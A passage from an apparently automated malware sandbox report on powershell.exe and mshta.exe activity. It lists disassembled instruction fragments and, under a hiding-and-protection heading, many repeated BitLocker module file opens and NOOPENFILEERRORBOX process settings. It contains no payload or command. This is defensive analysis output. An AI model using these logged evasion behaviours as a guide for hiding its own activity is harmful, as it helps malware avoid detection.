                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_047042D7 push ebx; ret 4_2_047042DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F736DB push ebx; iretd 4_2_06F736DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F7369B push ebx; iretd 4_2_06F736DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F735D8 push ebx; iretd 4_2_06F736DA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F86FE9 push es; retf 4_2_06F86FF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F864FF push esi; iretd 4_2_06F86507
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F8C38D push FFFFFF8Bh; iretd 4_2_06F8C38F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F8C33C push FFFFFF8Bh; ret 4_2_06F8C33E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F85089 push es; retf 4_2_06F8512C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F85011 push es; iretd 4_2_06F85038
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F85171 push es; retf 4_2_06F85174
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071C7051 push es; retf 4_2_071C7052
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00446870 push edi; ret 8_2_00446871
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433AFE push eax; mov dword ptr [esp], eax8_2_00433AFF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F530 push eax; mov dword ptr [esp], E1CAE11Dh8_2_0043F535
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043C5D0 push eax; mov dword ptr [esp], 77987799h8_2_0043C5DE

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
